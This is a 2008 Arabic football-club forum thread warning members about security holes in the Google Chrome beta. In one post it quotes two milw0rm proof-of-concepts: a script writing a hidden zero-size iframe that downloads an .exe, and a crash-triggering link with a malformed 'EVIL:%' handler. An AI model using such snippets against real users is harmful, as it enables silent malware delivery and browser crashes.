متصفح قوقل كروم وثغراته .. - نادي الهلال السعودي - شبكة الزعيم

مجد البطولات · #1 06/09/2008, 03:07 AM

من يومين تقريبا تم الافساح عن العملاق الجديد قوقل كروم
و الذي شد انظار العالم لما قدمته قوقل من برمجية قوية في مجال المتصفحات
لكن خاب ظنه و ذلك باكتشاف موقع ميلوورم عن ثغرة بالمتصفح
و الثغرة من نوع تطبيق كود جافا سكربت لفتح تطبيقات ذات امتدادات .exe
رابط الموضوع بالموقع :
http://www.milw0rm.com/exploits/6355
مكتشف الثغرة : nerex
لذلك اخواني نرجوا الاستغناء عنه الى حين صدور النسخ الكاملة و الكمال لله وحده
لأن النسخة هذي عي بيتا و عن قريب سيتم تحديثها و ان شاء الله حلها

من الايميل

هيلانينيو 10 · #2 06/09/2008, 03:14 AM

يعطيك الف عافيه ع التنبيه ..

تحياتي لك

nsm.99 · #3 06/09/2008, 03:19 AM

صدقت ياخوي .. فيه مشكلة أنه مافيه المفضلة تسمى بإسم ثاني

مجد البطولات · #4 06/09/2008, 06:24 AM

كود الـ PHP:

   *************************************************************************** 

 Author: nerex 

 E-mail: nerex[at]live[dot]com 

 
 Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically 

 downloaded to the user's computer without any user prompt. 

 
 This proof-of-concept was created for educational purposes only. 

 Use the code it at your own risk. 

 The author will not be responsible for any damages. 

 
 Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA) 

************************************************************************** 

********** 

********.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

http://www.milw0rm.com/exploits/6353

الثغرة الثانية

كود الـ PHP:

  --------------------------------------------------- 

Software: 

Google Chrome Browser 0.2.149.27 

 
Tested: 

Windows XP Professional SP3 

 
Result: 

Google Chrome Crashes with All Tabs 

 
Problem: 

An issue exists in how chrome behaves with undefined-handlers in chrome.dll version  

0.2.149.27. A crash can result without user interaction. When a user is made to visit  

a malicious link, which has an undefined handler followed by a 'special' character,  

the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.  

Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the  

EIP register at 0x01002FF4. 

 
Proof of Concept: 

http://evilfingers.com/advisory/google_chrome_poc.php 

 
Credit: 

Rishi Narang (psy.echo) 

www.greyhat.in 

www.evilfingers.com 

--------------------------------------------------- 

 
PoC Working/Exploit: 

Click for a demo <a href="EVIL:%">HERE</a> 

 
# milw0rm.com [2008-09-03]

هلالي اصيل1 · #5 07/09/2008, 06:09 AM

اشوا الي علمتني مسحته على طول

جزاك الله خير

SweeT Devil · #6 07/09/2008, 07:08 AM

لاآ هنتوآ ع آلتوضيح يـ آلغآلين ورده ,, ]

//

ع ـوـوآفـي

مجد البطولات · #7 08/09/2008, 08:41 AM

العفو الله يحفظكم يازعماء ...

blue sky · #8 10/09/2008, 03:52 AM

ايه والله هالبرنآمج ما استرحت لهـ ..!!

وصرآحه قريت قبل صدورهـ ان فيه عيوب ..!!

والحمدلله ان الكلآم طلع صح , وان فيه اكثر من 5 ثغرات ..!!

مجد البطولات · #9 10/09/2008, 08:53 PM

المشكلة المتصفح تجريبي يعني اكيد راح يكون فيه ثغرات

وعيوب ومع ذلك العالم تستخدمه وتجيك ايميلي انسرق

موقعى اخترق